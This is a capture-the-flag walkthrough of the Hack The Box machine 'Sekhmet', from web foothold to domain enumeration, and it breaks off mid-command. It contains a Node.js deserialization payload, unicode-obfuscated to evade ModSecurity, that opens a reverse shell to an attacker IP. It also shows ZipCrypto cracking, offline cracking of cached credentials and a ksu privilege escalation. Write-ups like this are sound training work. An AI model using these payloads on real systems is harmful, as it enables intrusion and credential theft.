> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-sekhmet.md).

# HTB -Sekhmet

## Enumeration and Foothold

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### [www.windcorp.htb](http://www.windcorp.htb)

Browsing to the http port reveals the domain name : `www.windcorp.htb`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fc1erm7JsyNmCAGClA2mf%2Fimage.png?alt=media&amp;token=d4f7a8b2-b6d0-41b3-aff8-f7a21dafdc02" alt=""><figcaption></figcaption></figure>

add it to the hosts file and access the domain.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLHkZIM0ebeXpGgc0mylQ%2Fimage.png?alt=media&amp;token=ecbe813e-a7c8-482c-9299-c0edb9c153dd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2tO3TKAdW61nEcBhlOMH%2Fimage.png?alt=media&amp;token=bd07eb76-3d57-4e0c-be93-78e14f2bb995" alt=""><figcaption></figcaption></figure>

The website is running Nginx 1.18.0.  No interesting directories found on directory enumeration.

But Found a new vhost `portal.windcorp.htb`

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
     -u <http://10.129.13.99/> \
     -H "Host: FUZZ.windcorp.htb" -fs 153

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://10.129.13.99/>
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.windcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 153
________________________________________________

portal                  [Status: 403, Size: 2436, Words: 234, Lines: 44, Duration: 356ms]

```

add portal to hosts.

### portal.windcorp.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbJBGqN5XzWpK9BvGDAhE%2Fimage.png?alt=media&amp;token=ee6adf11-b149-41f3-ad0c-b02f79f4a079" alt=""><figcaption></figcaption></figure>

I can login with the creds `admin: admin`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgKwKuScoDGqT8AQSzGxy%2Fimage.png?alt=media&amp;token=3118ce5d-4a74-4d03-a247-ba1c157d1a61" alt=""><figcaption></figcaption></figure>

The portal page, displays that the site is under construction and display how many seconds i have logged in. Also wappalyzer reveals `Node express` running.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQoXrmnUxQXphyAjOuJO9%2Fimage.png?alt=media&amp;token=305ced21-c269-4007-8418-565cc21797c2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwJ27PnparFk3RBRXekk4%2Fimage.png?alt=media&amp;token=40039a66-66bc-4b5c-b4b2-d918b2fad172" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fl0SP66jOmfAJH3qcsjd0%2Fimage.png?alt=media&amp;token=1fb23d0f-de9a-43f2-b60d-b8cd7f58f695" alt=""><figcaption></figcaption></figure>

I was able to update the time to logon.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvVrn1zohzdfaw9Otkduk%2Fimage.png?alt=media&amp;token=eb1f379c-106a-4998-8d0c-b8bcea10cdc4" alt=""><figcaption></figcaption></figure>

### Node JS Deserialization

I can use the below payload to exploit the vulnerability.

```json
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```

Good resource to understand JSON serialization

{% embed url="<https://mojoauth.com/serialize-and-deserialize/serialize-and-deserialize-json-with-waf#understanding-json-serialization-and-deserialization>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOuSaVr4zYswsS4GZKWoc%2Fimage.png?alt=media&amp;token=482644cf-fcfc-4f0d-b687-b53446d649e8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4kMFSsoCvbwtnlnqXFOS%2Fimage.png?alt=media&amp;token=cc315483-b2df-4a7a-84ba-e27f4332006f" alt=""><figcaption></figcaption></figure>

Payload is being blocked by Mod Security. Attempt to inject an IIFE payload triggered **ModSecurity**, a Web Application Firewall (WAF). The WAF detected the suspicious string `_$$ND_FUNC$$_` or the use of `child_process`, and consequently blocked your session. To successfully exploit this, you need to obfuscate your payload so that the WAF doesn't recognize it, while the backend library still processes it correctly.

In order to bypass the WAF i need to obfuscate my payload so that it goes undetected. I can try either unicode or hexcode obfuscation to bypass the WAF.

{% embed url="<https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/>" %}

The above article explains the exploitation very clearly.

what i am gonna do is unicode encode each character until my payload is passed

```bash
{"rce":"_$$ND_FUNC\u0024$_function() \u007brequire('child_process').exec('bash -c \"bash -i >& /dev/tcp/10.10.15.204/4444 0>&1\"', function(error,stdout,stderr) {console.log(stdout) });\n}()"}
```

AND I GOT CODE execution with the above payload.

## Shell as Webster

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2uu8uGztxkAWMPCtKtHa%2Fimage.png?alt=media&amp;token=5bd29eeb-d77d-4d87-90a9-e9a91143a0e4" alt=""><figcaption></figcaption></figure>

There is a `backup.zip` file in the webster home which is interesting.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzgyuYcSUhxvR7osT3gg1%2Fimage.png?alt=media&amp;token=472c4e43-7297-4789-8f47-b1f77b1c7658" alt=""><figcaption></figcaption></figure>

Transfer the file to attack machine and unzip the file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fi7HChYU3CrTLy9LWtPgD%2Fimage.png?alt=media&amp;token=d5fb85fb-076e-494e-beba-358750411a3f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FC70q3i1subZOTlDfurud%2Fimage.png?alt=media&amp;token=aed77a88-62bc-48e8-a888-c1c0be096e13" alt=""><figcaption></figcaption></figure>

unzipping the zip file asks for password. My first step was to use john to crack the password but that was waste of time.

I can sue 7z to list the files in the zip file.

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ /home/ajay/Tools/bkcrack-1.8.1-Linux-x86_64/bkcrack -L backup.zip 
bkcrack 1.8.1 - 2025-10-25
Archive: backup.zip
Index Encryption Compression CRC32    Uncompressed  Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
    0 ZipCrypto  Deflate     d00eee74         1509          554 etc/passwd
    1 None       Store       00000000            0            0 etc/sssd/conf.d/
    2 ZipCrypto  Deflate     a46408d2          411          278 etc/sssd/sssd.conf
    3 None       Store       00000000            0            0 var/lib/sss/db/
    4 ZipCrypto  Deflate     7c8f25f5      1286144         3122 var/lib/sss/db/timestamps_windcorp.htb.ldb
    5 ZipCrypto  Deflate     1586648d      1286144         2492 var/lib/sss/db/config.ldb
    6 None       Store       00000000            0            0 var/lib/sss/db/test/
    7 ZipCrypto  Deflate     2dda0c65      1286144         2421 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
    8 ZipCrypto  Deflate     861052a8      1286144         2536 var/lib/sss/db/test/config.ldb
    9 ZipCrypto  Deflate     cdf7b29c      1286144         5044 var/lib/sss/db/test/cache_windcorp.htb.ldb
   10 ZipCrypto  Deflate     2d029dc7      1286144         1505 var/lib/sss/db/test/sssd.ldb
   11 ZipCrypto  Deflate     22cd39c0         4016         3651 var/lib/sss/db/test/ccache_WINDCORP.HTB
   12 ZipCrypto  Deflate     8ff31622      1609728        10145 var/lib/sss/db/cache_windcorp.htb.ldb
   13 ZipCrypto  Deflate     2d029dc7      1286144         1505 var/lib/sss/db/sssd.ldb
   14 ZipCrypto  Deflate     c6656211         2708         2519 var/lib/sss/db/ccache_WINDCORP.HTB
   15 None       Store       00000000            0            0 var/lib/sss/deskprofile/
   16 None       Store       00000000            0            0 var/lib/sss/gpo_cache/
   17 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/
   18 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/
   19 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
   20 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
   21 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
   22 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
   23 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
   24 ZipCrypto  Deflate     5b393fde         2568          700 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
   25 ZipCrypto  Store       74a7bec9           23           35 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
   26 None       Store       00000000            0            0 var/lib/sss/keytabs/
   27 None       Store       00000000            0            0 var/lib/sss/mc/
   28 ZipCrypto  Deflate     10c2d4bf      9253600         9186 var/lib/sss/mc/passwd
   29 ZipCrypto  Deflate     a0dedff3      6940392         6814 var/lib/sss/mc/group
   30 ZipCrypto  Deflate     09850b8d     11567160        11389 var/lib/sss/mc/initgroups
   31 None       Store       00000000            0            0 var/lib/sss/pipes/
   32 None       Store       00000000            0            0 var/lib/sss/pipes/private/
   33 None       Store       00000000            0            0 var/lib/sss/pubconf/
   34 ZipCrypto  Store       5a1a3ba3           12           24 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
   35 None       Store       00000000            0            0 var/lib/sss/pubconf/krb5.include.d/
   36 ZipCrypto  Store       8c44e15f           40           52 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
   37 ZipCrypto  Deflate     cc306b59          113          105 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
   38 ZipCrypto  Store       701d2553           15           27 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
   39 None       Store       00000000            0            0 var/lib/sss/secrets/

```

The output shows that many files are encrypted with ZipCrypto.

A quick google search revealed that i can perform a plain text attack to crack the zipcrypto files.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlfPhiY3blaXhwB2UfVZM%2Fimage.png?alt=media&amp;token=b372befa-9243-4507-9beb-d555b259a00f" alt=""><figcaption></figcaption></figure>

one good tool to perform plain text attack is Bcrack.

### Bcrack to crack Zipcrypto Files

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAoeZ4PjV7gmjexkNuyOt%2Fimage.png?alt=media&amp;token=a2a003b8-915c-4386-abb3-21329a199307" alt=""><figcaption></figcaption></figure>

the size of /etc/passd is 1509 and it leaks the CRC number.&#x20;

So in order to crack i need to use a know file and luckily the `/etc/passwd` is there which i have access to using the webster shell.

So copy the passwd file to attackmachine and zip it as we need an unencrypted file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4BCBC3qNApxfHmUMYlZ7%2Fimage.png?alt=media&amp;token=7faf7f67-458f-4b64-8b61-81a98047b571" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvUluZRY98QkguGVQtZPg%2Fimage.png?alt=media&amp;token=3e19e7a5-b2de-4175-98d3-9b85451aaa9e" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ /home/ajay/Tools/bkcrack-1.8.1-Linux-x86_64/bkcrack  -C backup.zip -c etc/passwd -P passwd.zip -p passwd
bkcrack 1.8.1 - 2025-10-25
[09:59:06] Z reduction using 535 bytes of known plaintext
100.0 % (535 / 535)
[09:59:07] Attack on 14541 Z values at index 9
Keys: d6829d8d 8514ff97 afc3f825
91.1 % (13251 / 14541) 
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 13251
[09:59:33] Keys
d6829d8d 8514ff97 afc3f825
```

now i can use the keys to decrypt the zip file.

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ /home/ajay/Tools/bkcrack-1.8.1-Linux-x86_64/bkcrack -C backup.zip -k d6829d8d 8514ff97 afc3f825 -D decrypted.zip
bkcrack 1.8.1 - 2025-10-25
[10:06:35] Writing decrypted archive decrypted.zip
100.0 % (21 / 21)
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEIbmF819wMwWJoK4K197%2Fimage.png?alt=media&amp;token=f7b14ada-2939-4fe3-ad89-6268c24f66fa" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPQI1C7CzdytLZnLSBAnd%2Fimage.png?alt=media&amp;token=2aef9be9-d9bc-4387-b610-1e26d5be34a8" alt=""><figcaption></figcaption></figure>

Enumerating the zip file, there are cached ldb files.

The .ldb files are TDB (Trivial Database) format SSSD's cache database. You can extract data from them using ldb tools.

### LDBTOOLS to dump .ldb files

i can use the `tdbdump` to dump the data

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE2ik4dJfysZepbbEi5Nq%2Fimage.png?alt=media&amp;token=73d71a8a-98b3-4acb-b5be-f71a3f4f4f6e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBb5o7U3Z80TKwLrfsa3G%2Fimage.png?alt=media&amp;token=3137c8dd-f6f3-404c-ad6f-d07d2f5ce0b9" alt=""><figcaption></figcaption></figure>

got the cached password for Ray Duncan.

i can use hashcat or john the ripper to crack the hash.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkKoFbZMaHKYJVWlUM6fY%2Fimage.png?alt=media&amp;token=37d21301-972f-4dd9-ac28-5c116a777445" alt=""><figcaption></figcaption></figure>

`Ray Duncan : pantera`

Also, from the data I see:

* **User**: <Ray.Duncan@windcorp.htb>
* **Full Name**: Ray Duncan
* **Domain**: WINDCORP.HTB / [WINDCORP.COM](http://WINDCORP.COM)
* **UPN**: <Ray.Duncan@WINDCORP.COM>
* **Member of groups**: Development group and Domain Users

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkvsiL5ie3UbvPHl94uzn%2Fimage.png?alt=media&amp;token=c073e521-81b2-4884-befc-3702204c0f49" alt=""><figcaption></figcaption></figure>

SSSD is active and running with domain windcorp.htb. This means ray.duncan is a domain user, not a local user.

i can use the credentials fo `ray.duncan` to login through SSH to get a shell.

## Shell as Ray.Duncan

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8zXjXQWE78oMGw6qwRxE%2Fimage.png?alt=media&amp;token=1e19cc0d-8c44-4615-9b62-7759eab8ae98" alt=""><figcaption></figcaption></figure>

```bash
ray.duncan@windcorp.htb@webserver:/$ find / -perm -4000 -type f 2>/dev/null -exec ls -lh {} \;
-rwsr-xr-- 1 root messagebus 51K Feb 21  2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul  2  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root sssd 27K Feb 10  2021 /usr/libexec/sssd/proxy_child
-rwsr-xr-- 1 root sssd 93K Feb 10  2021 /usr/libexec/sssd/ldap_child
-rwsr-xr-- 1 root sssd 169K Feb 10  2021 /usr/libexec/sssd/krb5_child
-rwsr-xr-- 1 root sssd 84K Feb 10  2021 /usr/libexec/sssd/p11_child
-rwsr-xr-- 1 root sssd 57K Feb 10  2021 /usr/libexec/sssd/selinux_child
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-x 1 root root 23K Jan 13  2022 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 56K Aug 30  2021 /usr/bin/ksu
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh

```

Enumerating the SUID bit files i found an interesting file called `KSU`&#x20;

The ksu utility is a Kerberos-aware version of the `su` command.

Google search revealed that i can exploit the ksu uitlity to get to root if i have a valid kerberos tickets.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4S9fNl4ZGXAylM2qVsjY%2Fimage.png?alt=media&amp;token=0c1970ab-5871-4650-a2c2-df87cba3f176" alt=""><figcaption></figcaption></figure>

### Getting Valid Kerberos Ticket.

`kinit ray.duncan@windcorp.htb`

`password for ray.duncan`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhOp7Auvzhtn5GeF015l6%2Fimage.png?alt=media&amp;token=2d4fbb61-5d3c-4759-9bbf-8416f80cbe91" alt=""><figcaption></figcaption></figure>

### Prrivesc to Root using KSU&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FD76nHZHs1ZUlvGsPei9h%2Fimage.png?alt=media&amp;token=91bf6455-3509-482b-b88a-b3ab1e2050d1" alt=""><figcaption></figcaption></figure>

Once grabbed the user.txt, next i have checked for is if we got any additional interfaces. i found an internal host `192.168.0.100`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FC7jkdWo4upRf5HmfpvgP%2Fimage.png?alt=media&amp;token=c410ca79-d94e-4700-8187-19f25baf6c4b" alt=""><figcaption></figcaption></figure>

Scanning the internal host revealed a new host `192.168.0.2` which could possibily be a Domain Controller.

```bash
root@webserver:~# for i in {1..254}; do ping -c 1 192.168.0.$i 2>/dev/null & done | grep "bytes from" | cut -d' ' -f4 | cut -d':' -f1 | sort -u
192.168.0.100
192.168.0.2
root@webserver:~# 
```

With this details i can use ligolo tunneling to connect to the internal host and run commands directly from my attack machine.

### Tunneling through Ligolo-ng

To tunnel to the internal host i need to transfer agent.exe to the pivot machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvA1n3FlfQYBbeuJFsOMf%2Fimage.png?alt=media&amp;token=b373ceef-7b50-4b03-8ffd-bcfa506c8ec6" alt=""><figcaption></figcaption></figure>

Next setup the ligolo interface and poxy.

```bash
──(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ip tuntap add user $USER mode tun ligolo
[sudo] password for ajay: 
                                                                                                                    
┌──(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ip link set ligolo up

(ajay㉿kali)-[~/Tools/ligolo]
└─$ sudo ip route add 192.168.0.0/24 dev ligolo
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FL5A41t1ywMR709pB8oj7%2Fimage.png?alt=media&amp;token=3435530b-a156-4950-9491-8b55d58ebd71" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLdeNDWY8hRR1VArlFFsj%2Fimage.png?alt=media&amp;token=2cfe416c-3c0b-4aa6-810b-4dc138ee7080" alt=""><figcaption></figcaption></figure>

```bash
PORT      STATE  SERVICE       VERSION
22/tcp    open   ssh           OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
53/tcp    open   domain        Simple DNS Plus
80/tcp    open   http          nginx 1.18.0
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-13 16:25:51Z)
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
636/tcp   closed ldapssl
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open   mc-nmf        .NET Message Framing
49664/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
56167/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
56374/tcp open   msrpc         Microsoft Windows RPC

```

Scanning through nmap confirms that the internal host is a Domain Controller based on the open ports.

now get the ticket as ray.duncan on the attack machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3yqJuQfbFxXnhpYfSqwT%2Fimage.png?alt=media&amp;token=837e0758-bbbf-400c-82e3-7d7527609ab8" alt=""><figcaption></figcaption></figure>

i can use this ticket to enumerate all the open services on the machine.

```bash
export KRB5_CONFIG=/home/ajay/custom_krb5.conf
─(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2DFquYP0J5WEmVIH44tp%2Fimage.png?alt=media&amp;token=c06702b5-be24-4a04-8d3f-5fd08b664022" alt=""><figcaption></figcaption></figure>

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 192.168.0.2 -k --shares   
SMB         192.168.0.2     445    hope             [*]  (name:hope) (domain:windcorp.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         192.168.0.2     445    hope             [-] Error enumerating shares: Error while reading from remote
```

Domain Controller is `hope.windcorp.htb.` Add tot hosts file.

my nxc is not working properly beacuse of dns issue. I can use Smbclient to enumerate the shares.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZnmSVh4xRKsq27Oj5BkD%2Fimage.png?alt=media&amp;token=c5e3cbb7-254c-4e5f-8f11-89b8c347ec20" alt=""><figcaption></figcaption></figure>

there is a non default share WC-Share.\
I can use `impacket-smbclient` to enumerate the shares through the kerberos ticket.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVmUMdZxEHwKROYI8B9CX%2Fimage.png?alt=media&amp;token=7ab7b225-edf9-4ec2-99c0-2ed5ff8a2b5a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fyjj8zUWTAaFvCmwwBWzy%2Fimage.png?alt=media&amp;token=7df4b9f0-26b9-44d2-b594-45d32533d0c4" alt=""><figcaption></figcaption></figure>

can be passwords but dont know how to use them at this point.

Enumerating Netlogon, there is a `form.ps1` script&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FG0yRkHeytsuTYJsMLrTT%2Fimage.png?alt=media&amp;token=0143552c-e2fd-465e-90a2-102a7daa6029" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTg3kJm6jw0Z3uhoMAyVD%2Fimage.png?alt=media&amp;token=0cbc3fd9-1db5-49c3-be8b-8fa4b22c5a3b" alt=""><figcaption></figcaption></figure>

This script fetches the current user's Distinguished Name (DN) from ADSystemInfo, connects to their AD object using \[adsi], and displays a Windows Form (GUI) asking the user to update their mobile number.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzN2IoQFDt0z7NihVXwvP%2Fimage.png?alt=media&amp;token=2f75341b-4042-4055-98e2-d4700af19a38" alt=""><figcaption></figcaption></figure>

When the user clicks "OK," the script performs $User.Put("mobile",$x) and $User.SetInfo(). This confirms that the application has write access to the mobile attribute of user objects in AD. If this script is run with elevated privileges or if users can manipulate the input $x without proper sanitization, this could lead to issues.

`debug-users.txt`: This file contains a list of usernames followed by what appears to be a mobile number or an ID.

### ldapsearch to enumerate AD

Enumerating the mobile attribute, revealed that the numbers in the debug-users.txt is the mobile number.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvXxGELPNFG4a9Udbcphq%2Fimage.png?alt=media&amp;token=fd8ec3c2-a83b-4f64-9e36-cde6819c20c1" alt=""><figcaption></figcaption></figure>

The next thing i need to do is to check if we have write access.

```bash
┌──(ajay㉿kali)-[~]
└─$ cat > update_mobile.ldif <<EOF
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: 9999999999
EOF
```

```bash
┌──(ajay㉿kali)-[~]
└─$ ldapmodify -H ldap://192.168.0.2 -Y GSSAPI -f update_mobile.ldif                      
SASL/GSSAPI authentication started
SASL username: ray.duncan@WINDCORP.HTB
SASL SSF: 256
SASL data security layer installed.
